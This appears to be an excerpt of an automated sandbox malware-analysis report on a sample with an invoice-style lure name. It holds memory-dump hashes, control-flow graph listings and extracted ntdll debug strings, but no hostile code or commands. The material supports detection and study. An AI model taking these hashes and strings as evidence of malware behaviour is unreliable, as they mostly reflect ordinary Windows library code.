                                  • Instruction Fuzzy Hash: AB900221212C0042D20575685D18B47015547D0313F59D116E1158514CC9158A656521
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a4b51cda0dadfb4439bd565139eab8580a2cde3de551259cbe051d3dd53dbb8f
                                  • Instruction ID: 89d435e21392d9d93acfc80ffb89397982e21fc670a01dab045f1c08ec3a94b5
                                  • Opcode Fuzzy Hash: a4b51cda0dadfb4439bd565139eab8580a2cde3de551259cbe051d3dd53dbb8f
                                  • Instruction Fuzzy Hash: BF90023120280402D1057158591874B015547D0312F59D012E2168515D86258A557571
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 99456b0f4743eb51899e90910d24aa6ca01eb062c990542c46a847fd2fe16535
                                  • Instruction ID: be1ae1528d913101a0a55fdd374090e60dfac753b1424a684ca3d3f666ff180a
                                  • Opcode Fuzzy Hash: 99456b0f4743eb51899e90910d24aa6ca01eb062c990542c46a847fd2fe16535
                                  • Instruction Fuzzy Hash: DB90022160240042414571689948A4641556BE1221759D122E199C510D85598A696665
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff48e87f4009c7e9fc7b23cf88bd28605e3eee46703b19a7b46d187096428a58
                                  • Instruction ID: 31df4dfbc91fb569b1febd66a1e5815f62d6af2b031852ca990ec71a080eb961
                                  • Opcode Fuzzy Hash: ff48e87f4009c7e9fc7b23cf88bd28605e3eee46703b19a7b46d187096428a58
                                  • Instruction Fuzzy Hash: 0590023120280402D1057158590C787015547D0312F59D012E6168515E8665CA957531
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d5185cd41cd9c9fba1a7b750dcc080afeb890ba6b888bd435f911ba8628839b
                                  • Instruction ID: 9665186686d7f8c5c831a575548da66a428e12bad2474df562375f3c29cf89b4
                                  • Opcode Fuzzy Hash: 0d5185cd41cd9c9fba1a7b750dcc080afeb890ba6b888bd435f911ba8628839b
                                  • Instruction Fuzzy Hash: 7390023120240842D10571585508B86015547E0311F59D017E1128614D8615CA557521
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 899d85f59f285ede8ef826c0ed0067b39c43f19e35fdd696e2e6fe9be7cfe575
                                  • Instruction ID: 7dab44d22f83d7fd1d10301895d01eb5701997132e2d4bfcc9bbe21d9091bbf7
                                  • Opcode Fuzzy Hash: 899d85f59f285ede8ef826c0ed0067b39c43f19e35fdd696e2e6fe9be7cfe575
                                  • Instruction Fuzzy Hash: 8990022160640402D1457158651C746016547D0211F59E012E1028514DC6598B5976A1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b78ceec1825d3ac2b9c19dd179855914f1afcd025933d9c2306e587764825b3a
                                  • Instruction ID: cef5cd9667acd41102006cc70c25d27f4263aa8856981dfd1261d2f3cdf33170
                                  • Opcode Fuzzy Hash: b78ceec1825d3ac2b9c19dd179855914f1afcd025933d9c2306e587764825b3a
                                  • Instruction Fuzzy Hash: 7690023120240403D1057158660C747015547D0211F59E412E1428518DD6568A557121
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cb54ea68264474b4bf68e5e4fde9625c8fdb2e03188392193b9bdb97eb3030f
                                  • Instruction ID: 32c1940302d5ebf621ddc5423cfbcae06423ccbc5f243b06296bebe162065076
                                  • Opcode Fuzzy Hash: 4cb54ea68264474b4bf68e5e4fde9625c8fdb2e03188392193b9bdb97eb3030f
                                  • Instruction Fuzzy Hash: C790023120240402D1057598650C786015547E0311F59E012E6028515EC6658A957131
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 571370f7462d9140f9acf26cc48bd18395fddc55e9846950ece44baa4e25df9d
                                  • Instruction ID: 94b05caff92ea270a5d3f4acbff4b5574525ff3379354016654d8606265e2a22
                                  • Opcode Fuzzy Hash: 571370f7462d9140f9acf26cc48bd18395fddc55e9846950ece44baa4e25df9d
                                  • Instruction Fuzzy Hash: 7990022921340002D1857158650C74A015547D1212F99E416E1019518CC9158A6D6321
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 90e7c4996557debce2fef6ae9e65d72f2db184fa99b9a550299e8675c4f010fc
                                  • Instruction ID: a9f6fa1339b3e468ce8857e374099479cfc7b2e2c68d4eecd91b18e31d3a7f49
                                  • Opcode Fuzzy Hash: 90e7c4996557debce2fef6ae9e65d72f2db184fa99b9a550299e8675c4f010fc
                                  • Instruction Fuzzy Hash: 2790022120644442D1057558650CB46015547D0215F59E012E2068555DC6358A55B131
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d216133f9a809635b78087dc8ed83bb3b687a202290dcdd6d50ebd9f7596016c
                                  • Instruction ID: ec5d4a576c961276bb0fe199ba593c89afafb302b133d7208bbe823b256caac5
                                  • Opcode Fuzzy Hash: d216133f9a809635b78087dc8ed83bb3b687a202290dcdd6d50ebd9f7596016c
                                  • Instruction Fuzzy Hash: 4490022130240003D1457158651C746415597E1311F59E012E1418514CD9158A5A6222
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ada7b379f27efbdc3f5b3edb479f439f38b87533bd594f48b39792de96d4c46a
                                  • Instruction ID: 38b2c8161545218c172b6fc4541c5df13e0033815d9674e091b5edfd0c238cd8
                                  • Opcode Fuzzy Hash: ada7b379f27efbdc3f5b3edb479f439f38b87533bd594f48b39792de96d4c46a
                                  • Instruction Fuzzy Hash: 9090022124344152554AB1585508647415657E0251799D013E2418910C85269A5AE621
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 373caa334101c4a6c65a51a7bd8584825ce4ba13f8e2a4fdfd424d8c72668eed
                                  • Instruction ID: eccf4ec13e6561bca441c389a59465ce28b76579d87450b8566e2a08bf129588
                                  • Opcode Fuzzy Hash: 373caa334101c4a6c65a51a7bd8584825ce4ba13f8e2a4fdfd424d8c72668eed
                                  • Instruction Fuzzy Hash: 5490023124240402D14671585508746015957D0251F99D013E1428514E86558B5ABA61
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: d6b095ffc2505a062e12a0821b016ca4459385dc2147b0a7676ccd3be70fcbdb
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1127 32522890-325228b3 1128 3255a4bc-3255a4c0 1127->1128 1129 325228b9-325228cc 1127->1129 1128->1129 1130 3255a4c6-3255a4ca 1128->1130 1131 325228ce-325228d7 1129->1131 1132 325228dd-325228df 1129->1132 1130->1129 1133 3255a4d0-3255a4d4 1130->1133 1131->1132 1135 3255a57e-3255a585 1131->1135 1134 325228e1-325228e5 1132->1134 1133->1129 1136 3255a4da-3255a4de 1133->1136 1137 325228eb-325228fa 1134->1137 1138 32522988-3252298e 1134->1138 1135->1132 1136->1129 1139 3255a4e4-3255a4eb 1136->1139 1140 32522900-32522905 1137->1140 1141 3255a58a-3255a58d 1137->1141 1142 32522908-3252290c 1138->1142 1143 3255a564-3255a56c 1139->1143 1144 3255a4ed-3255a4f4 1139->1144 1140->1142 1141->1142 1142->1134 1145 3252290e-3252291b 1142->1145 1143->1129 1146 3255a572-3255a576 1143->1146 1147 3255a4f6-3255a4fe 1144->1147 1148 3255a50b 1144->1148 1149 32522921 1145->1149 1150 3255a592-3255a599 1145->1150 1146->1129 1151 3255a57c call 32530050 1146->1151 1147->1129 1152 3255a504-3255a509 1147->1152 1153 3255a510-3255a536 call 32530050 1148->1153 1154 32522924-32522926 1149->1154 1158 3255a5a1-3255a5c9 call 32530050 1150->1158 1169 3255a55d-3255a55f 1151->1169 1152->1153 1153->1169 1155 32522993-32522995 1154->1155 1156 32522928-3252292a 1154->1156 1155->1156 1164 32522997-325229b1 call 32530050 1155->1164 1160 32522946-32522966 call 32530050 1156->1160 1161 3252292c-3252292e 1156->1161 1176 32522969-32522974 1160->1176 1161->1160 1166 32522930-32522944 call 32530050 1161->1166 1164->1176 1166->1160 1172 32522981-32522985 1169->1172 1176->1154 1178 32522976-32522979 1176->1178 1178->1158 1179 3252297f 1178->1179 1179->1172
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: d80134792dfb5e4892c596ea509428e118a4dd3af04ec4b7b1e51d14c8469b38
                                  • Instruction ID: c50a918128c767e13321e1902b7853f5b12a2db0fff97560fa129198418de2c2
                                  • Opcode Fuzzy Hash: d80134792dfb5e4892c596ea509428e118a4dd3af04ec4b7b1e51d14c8469b38
                                  • Instruction Fuzzy Hash: 6D510DBAA0031ABFDB14DB58C990A7EFBB8BB483417508169E495D76C1D634DF40CBE0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1180 32592410-32592433 1181 32592439-3259243d 1180->1181 1182 325924ec-325924ff 1180->1182 1181->1182 1183 32592443-32592447 1181->1183 1184 32592501-3259250a 1182->1184 1185 32592513-32592515 1182->1185 1183->1182 1186 3259244d-32592451 1183->1186 1184->1185 1187 3259250c 1184->1187 1188 32592517-3259251b 1185->1188 1186->1182 1189 32592457-3259245b 1186->1189 1187->1185 1190 32592538-3259253e 1188->1190 1191 3259251d-3259252c 1188->1191 1189->1182 1193 32592461-32592468 1189->1193 1192 32592543-32592547 1190->1192 1194 3259252e-32592536 1191->1194 1195 32592540 1191->1195 1192->1188 1196 32592549-32592556 1192->1196 1197 3259246a-32592471 1193->1197 1198 325924b6-325924be 1193->1198 1194->1192 1195->1192 1199 32592558-32592562 1196->1199 1200 32592564 1196->1200 1202 32592473-3259247b 1197->1202 1203 32592484 1197->1203 1198->1182 1201 325924c0-325924c4 1198->1201 1204 32592567-32592569 1199->1204 1200->1204 1201->1182 1205 325924c6-325924ea call 32530510 1201->1205 1202->1182 1206 3259247d-32592482 1202->1206 1207 32592489-325924ab call 32530510 1203->1207 1209 3259256b-3259256d 1204->1209 1210 3259258d-3259258f 1204->1210 1218 325924ae-325924b1 1205->1218 1206->1207 1207->1218 1209->1210 1213 3259256f-3259258b call 32530510 1209->1213 1215 325925ae-325925d0 call 32530510 1210->1215 1216 32592591-32592593 1210->1216 1225 325925d3-325925df 1213->1225 1215->1225 1216->1215 1220 32592595-325925ab call 32530510 1216->1220 1222 32592615-32592619 1218->1222 1220->1215 1225->1204 1227 325925e1-325925e4 1225->1227 1228 32592613 1227->1228 1229 325925e6-32592610 call 32530510 1227->1229 1228->1222 1229->1228
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 1da469800208aa25a722d9b0f07815b5ce9cd63e887859928f166a96c1364f54
                                  • Instruction ID: 1233cc029c4f9659bdfac8d8109b53bf4ba15679653e69201308d06de7ca628f
                                  • Opcode Fuzzy Hash: 1da469800208aa25a722d9b0f07815b5ce9cd63e887859928f166a96c1364f54
                                  • Instruction Fuzzy Hash: 07510775A00745AFEB64CF9DC9A0ABFBBF8EB44240B408859E4D9C7641EA74DF00CB60

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: HEAP:
                                  • API String ID: 3446177414-2466845122
                                  • Opcode ID: 8c017684f791adb509ae266acbccc134ac7c1a17b6aee84f95a873736d87dea4
                                  • Instruction ID: da99b4e9906c892a1c20617c40ae66832d86acd404f951d90935fc0ca6079673
                                  • Opcode Fuzzy Hash: 8c017684f791adb509ae266acbccc134ac7c1a17b6aee84f95a873736d87dea4
                                  • Instruction Fuzzy Hash: 18A18C75A043128FDB09CE28C890A1ABBE5FF88364F15496DF945DB350EB70EE46CB91

                                  Control-flow Graph

                                  Strings
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 32554742
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32554655
                                  • ExecuteOptions, xrefs: 325546A0
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 325546FC
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 32554787
                                  • Execute=1, xrefs: 32554713
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32554725
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: b5a8542397e1fdc84d471fd061d5b9d9c4dceaddf9422073b95b85180e8b21a3
                                  • Instruction ID: f3cd50072f883d1e07f7b1a0bf0fa70fc144bf248fd799e80da5987c6082a94a
                                  • Opcode Fuzzy Hash: b5a8542397e1fdc84d471fd061d5b9d9c4dceaddf9422073b95b85180e8b21a3
                                  • Instruction Fuzzy Hash: 3F510575A00319BBFF109EA9DC95FAE77B8AF44345F9004A9E505AB1C0EB70AB45CF50
                                  Strings
                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325479FA
                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 325479D0, 325479F5
                                  • SsHd, xrefs: 324FA3E4
                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325479D5
                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 32547AE6
                                  • Actx , xrefs: 32547A0C, 32547A73
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                  • API String ID: 0-1988757188
                                  • Opcode ID: 5dc9ffbbacf3524a8f78c1edadc729ef2ef74ca58a6918fa822ee60a46db02fa
                                  • Instruction ID: 4f47f1dc22d9bfe622660885045ab9ca558715f101fa73b1cc3ecf24ade3b3e7
                                  • Opcode Fuzzy Hash: 5dc9ffbbacf3524a8f78c1edadc729ef2ef74ca58a6918fa822ee60a46db02fa
                                  • Instruction Fuzzy Hash: E9E1C174604352AFE714CE25C884B5AB7E1AFC4B58F504A2EEC95CB390DF32DA85CB91
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                  • API String ID: 3446177414-4227709934
                                  • Opcode ID: d91876eeef8e8ff8c8445082963cc38fb000e208b8654bc77eefd9ea4c4e23a2
                                  • Instruction ID: f651a2156da0423dbd7e831563c0df0f17b6582deb731a4441ee70c8feee0883
                                  • Opcode Fuzzy Hash: d91876eeef8e8ff8c8445082963cc38fb000e208b8654bc77eefd9ea4c4e23a2
                                  • Instruction Fuzzy Hash: 1B416CB9A01209ABDB01DF99C980ADEBBB5BF49314F20015AED05E7351DB719A51CBA0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2382945786.00000000324B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324B0000, based on PE: true
                                  • Associated: 00000003.00000002.2382945786.00000000325D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.00000000325DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2382945786.000000003264E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_324b0000_FACTURAS PENDIENTES VAYPER AUTOMOCION 1.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                  • API String ID: 3446177414-3492000579
                                  • Opcode ID: 881e2f060d5e99e3b46bc3993af7174ef00a5e437bd497e391f6d43fce130f18
                                  • Instruction ID: 954255f8af51d74c908e99da339fbb3ccfa2389798b74d7203ca4ac1c62395d5
                                  • Opcode Fuzzy Hash: 881e2f060d5e99e3b46bc3993af7174ef00a5e437bd497e391f6d43fce130f18
                                  • Instruction Fuzzy Hash: 0A71CD36A01284DFDB05CFA8D4506ADFBF2FF8A314F848499E445EB252CBB59A81CF50
                                  APIs
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 32539AC5, 32539B06
                                  • LdrpLoadShimEngine, xrefs: 32539ABB, 32539AFC
                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32539AB4
